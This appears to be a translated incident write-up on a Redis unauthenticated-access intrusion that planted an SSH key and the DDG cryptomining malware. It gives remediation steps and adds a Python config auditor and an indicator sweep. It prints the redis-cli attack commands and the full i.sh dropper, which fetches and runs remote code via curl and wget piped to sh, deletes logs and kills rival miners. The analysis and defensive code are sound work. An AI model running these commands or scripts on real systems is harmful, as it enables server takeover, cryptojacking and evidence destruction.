Intrusion principle

The attacker connects to the server through Redis and uses it to write an SSH public key for password-less login onto the server.

  1. Generate the SSH key pair and write the public key into the file to be sent

    • ssh-keygen -t rsa -C "XXX"
    • (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
  2. Connect to the target Redis service and clear all of its data

    • redis-cli -h 12.34.56.78
    • flushall
  3. Write the public key into the target machine's authorized_keys file

    • cat foo | redis-cli -h 12.34.56.78 -x set crackit
    • redis-cli -h 12.34.56.78
    • config set dir /root/.ssh/
    • config get dir
    • config set dbfilename "authorized_keys"
  4. Log in to the target server remotely

Remediation process

Solution steps:

  1. Close the unauthenticated Redis port
  2. Clean up the authorized_keys entries that were written
  3. Remove the scheduled task in the /var/spool/cron directory
  4. Kill the qW3xT.4 and ddgs.3016 processes
  5. Delete the qW3xT.4 and ddgs.3016 executables under /tmp
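Step 1 is the one that removes the root cause. As an added example, not part of the original post, the audit below parses a redis.conf and reports the settings that made the attack possible (a wildcard bind, no requirepass, protected-mode off, CONFIG reachable from clients, a data directory under .ssh), with a weak and a hardened sample configuration side by side. Both samples are constructed, the password value is a placeholder, and the function names are mine.

```python
import re

# Constructed sample of a weak redis.conf: every interface, no password, protected mode
# off, CONFIG usable by any client, and a data directory that is really /root/.ssh.
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
dir /root/.ssh
"""

# The same instance hardened. The password is a placeholder to be replaced.
HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "-::*"}
SENSITIVE_DIRS = re.compile(r"(^|/)\.ssh/?$|^/var/spool/cron|^/root/?$|^/etc(/|$)")


def parse_conf(text: str) -> dict:
    """Map each directive (lower-cased) to the list of argument lists it was given.
    rename-command may repeat; for the other directives Redis keeps the last one."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str) -> list:
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_conf(text)
    findings = []

    binds = conf.get("bind", [[]])[-1]
    if not binds or WILDCARD_BINDS & set(binds):
        findings.append("bind: listens on all interfaces; restrict to loopback or an internal address")

    if "requirepass" not in conf:
        findings.append("requirepass: not set; every client that reaches the port is fully trusted")

    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode: disabled; the guard for unbound, passwordless instances is off")

    renamed = {a[0].upper(): a[1] for a in conf.get("rename-command", []) if len(a) == 2}
    if renamed.get("CONFIG") != '""':
        findings.append("CONFIG: still reachable; clients can set dir/dbfilename and write files as the redis user")

    data_dir = conf.get("dir", [["./"]])[-1][0]
    if SENSITIVE_DIRS.search(data_dir):
        findings.append(f"dir: {data_dir} is a sensitive location; a SAVE would overwrite files there")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_redis_conf(text)
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

The hardened sample keeps Redis on loopback, requires a password, and removes CONFIG and FLUSHALL from what a network client can issue; if the instance must be reachable from other hosts, bind it to the internal address only and put a firewall rule in front of it as well.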

Analysis is as follows:

  • The scheduled task `*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh` fetches and runs i.sh, whose content is:

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "" > /var/spool/cron/root
    echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
    echo "*/15 * * * * wget -q -O - http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root

    mkdir -p /var/spool/cron/crontabs
    echo "" > /var/spool/cron/crontabs/root
    echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
    echo "*/15 * * * * wget -q -O - http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

    rm -rf /var/cache /var/log
    ps auxf | grep -v grep | grep /tmp/ddgs.3016 || rm -rf /tmp/ddgs.3016
    if [ ! -f "/tmp/ddgs.3016" ]; then
        wget -q http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -O /tmp/ddgs.3016
        curl -fsSL http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -o /tmp/ddgs.3016
    fi
    chmod +x /tmp/ddgs.3016 && /tmp/ddgs.3016

    ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
    #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
    #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

    In order, the script:

    1. Rewrites the root crontab (/var/spool/cron/root and /var/spool/cron/crontabs/root) so that i.sh keeps being re-fetched
    2. Runs rm -rf /var/cache /var/log, wiping caches and logs
    3. Downloads the main file ddgs.3016 and executes it
    4. Kills other mining processes on the system
  • Looking at the address used in the script, http://216.155.135.37:8000/static/, the following files exist there

  • disable.sh is as follows:

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
    touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
    chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
    chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty

    ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill
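Remediation steps 3 to 5 and the kill list in i.sh together give a concrete set of indicators for this incident. As an added example, not from the original post, the read-only sweep below looks for them in the cron files the script rewrites, in the process list and in /tmp, so a host can be checked before anything is killed or deleted. The cron lines, ps output and /tmp listing embedded here are constructed samples; the C2 host, payload names and pool domains come from the page's own script; the function names and the cron file list are my choices.

```python
import os
import re
import subprocess

# Indicators from this incident: the download host in the cron entry, the payload and
# companion process names, and the pool domains i.sh itself greps for when it kills
# competing miners.
IOC_PATTERNS = [re.compile(p) for p in (
    r"216\.155\.135\.37",                          # cron entry / download host
    r"ddgs\.\d{4}",                                # main payload, ddgs.3016 on this box
    r"qW3xT\.\d+",                                 # companion miner process qW3xT.4
    r"hashvault\.pro|nanopool\.org|minexmr\.com",  # pools named in the script's kill list
)]

# Files i.sh overwrites, plus the system crontab (assumed list, extend per distribution).
CRON_FILES = ("/var/spool/cron/root", "/var/spool/cron/crontabs/root", "/etc/crontab")

# Constructed samples so the sweep can be exercised offline.
SAMPLE_CRON = """\
*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
"""
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 169000 11000 ? Ss 09:00 0:02 /sbin/init
root 777 0.0 0.0 72000 6000 ? Ss 09:00 0:00 /usr/sbin/sshd -D
root 4321 99.0 2.0 713000 20000 ? Ssl 10:01 12:34 /tmp/ddgs.3016
root 4355 95.0 1.5 650000 18000 ? Ssl 10:02 11:59 /tmp/qW3xT.4
"""
SAMPLE_TMP = ["systemd-private-abc", "ddgs.3016", "qW3xT.4", "tmp.XYZ"]


def _hit(s: str) -> bool:
    return any(p.search(s) for p in IOC_PATTERNS)


def scan_cron(text: str) -> list:
    """Return (line number, line) for every cron entry that matches an indicator."""
    return [(n, line) for n, line in enumerate(text.splitlines(), start=1) if _hit(line)]


def scan_processes(ps_output: str) -> list:
    """Parse `ps aux` output (header + rows) and return (pid, command) for matching rows."""
    hits = []
    for row in ps_output.splitlines()[1:]:
        fields = row.split(None, 10)  # the 11th field is the full command line
        if len(fields) < 11:
            continue
        pid, command = int(fields[1]), fields[10]
        if _hit(command):
            hits.append((pid, command))
    return hits


def scan_tmp(entries) -> list:
    """Return the /tmp entries whose names match an indicator."""
    return [e for e in entries if _hit(e)]


def sweep_host() -> dict:
    """Run the three checks against the live host. Read-only: nothing is killed or deleted."""
    report = {"cron": {}, "processes": [], "tmp": []}
    for path in CRON_FILES:
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                hits = scan_cron(fh.read())
            if hits:
                report["cron"][path] = hits
    ps = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=False).stdout
    report["processes"] = scan_processes(ps)
    report["tmp"] = scan_tmp(os.listdir("/tmp"))
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(sweep_host(), indent=2))
```

Because i.sh re-installs its crontab entry every run, the order of the cleanup matters: confirm with this sweep, remove the cron entries first, then stop the processes and delete the files, and run the sweep again afterwards to make sure nothing came back.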

This script also stops other mining programs from running, among them the yilu ones (https://www.yiluzhuanqian.com/).

For a write-up of this virus, see the 52pojie (吾爱破解) forum's analysis of the latest DDG variant, 3014: Latest DDG variant 3014 sample analysis.